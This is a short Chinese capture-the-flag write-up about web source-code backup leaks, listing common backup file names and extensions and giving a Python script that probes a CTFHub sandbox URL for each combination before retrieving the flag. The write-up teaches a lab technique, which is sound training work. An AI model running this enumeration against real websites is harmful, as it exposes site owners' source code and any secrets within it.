题目描述

当开发人员在线上环境中对源代码进行了备份操作,并且将备份文件放在了 web 目录下,就会引起网站源码泄露。

Solution

1.png

常见的网站源码备份文件后缀:

  • tar
  • tar.gz
  • zip
  • rar

常见的网站源码备份文件名:

  • web
  • website
  • backup
  • back
  • www
  • wwwroot
  • temp

我们根据此编写 Python 脚本穷举每一个可能:

  1. import requests
  3. url = "http://challenge-c50bcce7f9b4dc5c.sandbox.ctfhub.com:10800/"
  5. file_suffix = ["tar", "tar.gz", "zip", "rar"]
  6. file_name = ["web", "website", "backup", "back", "www", "wwwroot", "temp"]
  8. for i in file_name:
  9.     for j in file_suffix:
  10.         url_current = url + i + "." + j;
  11.         resp = requests.get(url_current)
  12.         if resp.status_code == 200:
  13.             print(url_current)

运行结果如下:

2.png

我们浏览器访问,将其下载到本地:

3.png

但是那个 Flag 文件打开一看,什么都没有:

4.png

注意,这是网站源码,我们可以尝试在浏览器访问这个文件:

5.png